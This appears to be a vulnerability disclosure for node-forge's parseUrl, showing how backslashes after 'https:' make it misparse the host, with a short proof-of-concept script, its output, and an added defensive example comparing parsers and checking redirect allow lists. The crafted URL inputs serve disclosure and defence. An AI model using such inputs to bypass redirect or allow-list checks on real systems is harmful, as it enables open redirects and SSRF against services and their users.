Open Redirect in digitalbazaar/forge
Reported on Sep 4th 2021
✍️ Description
The parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path. Browsers accept backslashes after the protocol and treat them as normal slashes, while node-forge sees them as a relative path, which leads to URL redirection to an untrusted site.
🕵️♂️ Proof of Concept
Create the following PoC file:
// poc.js
var forge = require("node-forge");
// In a JS string literal "\/" is just "/" and "\w" is just "w", so the
// string parseUrl actually receives is "https:///www.github.com/foo/bar".
var url = forge.util.parseUrl("https:/\/\/\www.github.com/foo/bar");
console.log(url);
Execute the following commands in another terminal:
npm i node-forge # Install affected module
node poc.js # Run the PoC
Check the Output:
{
full: 'https://',
scheme: 'https',
host: '',
port: 443,
path: '/www.github.com/foo/bar', <<<---- path should be "/foo/bar"
fullHost: ''
}
In the above example, path should be "/foo/bar", or parseUrl should return null as per https://github.com/digitalbazaar/forge/blob/c666282c812d6dc18e97b419b152dd6ad98c802c/lib/util.js#L2266
💥 Impact
Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
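As an added example (not code from the report or from node-forge), the following contrasts a naive regex parser of the "scheme://host" shape the report describes with Node's built-in WHATWG URL parser, which skips slashes and backslashes after http(s) the way browsers do, and shows an allow-list check that decides on the host a browser would actually navigate to. The function names naiveParse, browserHost, parsersDisagree and isAllowedRedirect are hypothetical, and the inputs are constructed.

```javascript
// Added example, not part of the original report or of node-forge.
// A naive "scheme://host" regex parser (a stand-in for the behaviour
// the report describes, not forge's actual code) is contrasted with
// Node's built-in WHATWG URL parser, which skips "/" and "\" after
// http(s) the way browsers do, and a host check uses the browser view.

// Naive parser: only recognises "scheme://host[:port]path".
function naiveParse(str) {
  const m = /^(https?):\/\/([^:\/]*):?(\d*)(.*)$/.exec(str);
  if (m === null) return null;
  return {
    scheme: m[1],
    host: m[2],
    port: m[3] || (m[1] === "https" ? "443" : "80"),
    path: m[4],
  };
}

// Host as a browser would resolve it (WHATWG URL is global in Node >= 10).
function browserHost(str) {
  try {
    return new URL(str).host;
  } catch (e) {
    return null; // not an absolute URL at all
  }
}

// True when the naive parser and the browser disagree on the host: the
// parser differential that turns a "relative" path into a redirect.
function parsersDisagree(str) {
  const naive = naiveParse(str);
  return (naive === null ? null : naive.host) !== browserHost(str);
}

// Redirect allow-list check that decides on the host a browser would use.
function isAllowedRedirect(str, allowedHosts) {
  const host = browserHost(str);
  return host !== null && allowedHosts.includes(host);
}

// Constructed inputs: the report's PoC string as its JS literal actually
// resolves (three slashes), and one that carries real backslashes.
const pocInput = "https:///www.github.com/foo/bar";
const backslashInput = "https:/\\/\\/\\www.github.com/foo/bar";

for (const s of [pocInput, backslashInput]) {
  console.log(s, naiveParse(s), browserHost(s), parsersDisagree(s),
    isAllowedRedirect(s, ["example.com"]));
}
```

For both inputs the naive parser either reports an empty host or no match while the browser view resolves www.github.com, which is why a redirect check must not trust the naive host.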
The whole forge.util.parseUrl API and other URL related APIs were removed in v1.0.0.
@maintainer Can you please validate this issue by clicking on Mark as valid, and confirm the fix. Thanks.